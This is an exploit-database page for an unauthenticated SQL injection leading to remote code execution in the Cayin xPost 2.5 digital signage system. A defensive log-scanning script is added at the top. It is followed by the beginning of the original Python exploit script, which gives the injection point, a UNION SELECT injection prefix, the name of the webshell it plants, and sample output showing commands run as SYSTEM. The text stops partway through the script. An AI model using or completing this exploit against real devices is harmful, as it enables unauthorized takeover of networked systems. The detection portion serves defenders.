Cayin digital signage system xpost 2.5 remote command injection Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2020-06-04 |
Type : webapps |
Platform : multiple
This exploit / vulnerability (Cayin digital signage system xpost 2.5 remote command injection) is for educational purposes only; if you use it, you do so at your own risk!
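For defenders: the header of the script below names the unauthenticated GET parameter `wayfinder_seqid` in `wayfinder_meeting_input.jsp` as the injection point. The following is an added detection example, not part of the original exploit or the vendor's code; it scans web access-log lines for requests to that page whose parameter is not a plain integer. The log layout, the assumption that legitimate values are numeric, and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter named in the advisory text on this page.
VULN_PATH = "/cayin/wayfinder/wayfinder_meeting_input.jsp"
PARAM = "wayfinder_seqid"

# Assumption: Apache/Tomcat "common" access-log layout.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Assumption: a legitimate sequence id is a plain non-negative integer.
INT_RE = re.compile(r"\d{1,10}")


def suspicious_requests(lines):
    """Return (ip, timestamp, decoded_value) for each request to the vulnerable
    page whose wayfinder_seqid is not a plain integer."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log record in the assumed layout
        url = urlsplit(m["target"])
        if url.path != VULN_PATH:
            continue
        # parse_qs percent-decodes, so encoded quotes and spaces become visible.
        values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
        for value in values:
            if not INT_RE.fullmatch(value):
                hits.append((m["ip"], m["ts"], value))
    return hits


# Constructed sample lines (not real traffic). The flagged value reuses only
# the query prefix that already appears in the script on this page.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jun/2020:10:00:01 +0000] "GET /cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid=12 HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Jun/2020:10:00:07 +0000] "GET /cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid=-251%27%20UNION%20ALL%20SELECT%20 HTTP/1.1" 200 97',
    '10.0.0.5 - - [04/Jun/2020:10:00:09 +0000] "GET /cayin/index.jsp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, ts, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious {PARAM}={value!r}")
```

Because the endpoint is reachable without authentication, any hit from an untrusted network is worth triage, alongside a check of the web root for unexpected `.jsp` files such as the `thricer.jsp` name used in the script.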
#!/usr/bin/env python3
#
#
# Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution
#
#
# Vendor: CAYIN Technology Co., Ltd.
# Product web page: https://www.cayintech.com
# Affected version: 2.5.18103
#                   2.0
#                   1.0
#
# Summary: CAYIN xPost is the web-based application software, which offers a
# combination of essential tools to create rich contents for digital signage in
# different vertical markets. It provides an easy-to-use platform for instant
# data entry and further extends the usage of CAYIN SMP players to meet users'
# requirements of frequent, daily maintenance.
#
# Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability.
# Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp
# is not properly sanitised before being returned to the user or used in SQL queries.
# This can be exploited to manipulate SQL queries by injecting arbitrary SQL code
# and execute SYSTEM commands.
#
# --------------------------------------------------------------------------------
# lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888
# # Injecting...
# # Executing...
#
# Command: whoami
#
# nt authority\system
#
#
# You have a webshell @ http://192.168.2.1:8888/thricer.jsp
# lqwrm@zslab:~$
# --------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 10 Home
#            Microsoft Windows 8.1
#            Microsoft Windows Server 2016
#            Microsoft Windows Server 2012
#            Microsoft Windows 7 Ultimate SP1
#            Apache Tomcat/9.0.1
#            MySQL/5.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5571
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php
#
#
# 15.05.2020
#
import requests as req
import time as vremeto
import sys as sistemot
import re as regularno
if len(sistemot.argv) < 2:
    print("Cayin xPost 2.5 Pre-Auth SQLi RCE")
    print("Usage: ./wayfinder.py ip:port")
    sistemot.exit(19)
else:
    ip = sistemot.argv[1]
filename = "thricer.jsp"
urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid="
constr = "-251' UNION ALL SELECT "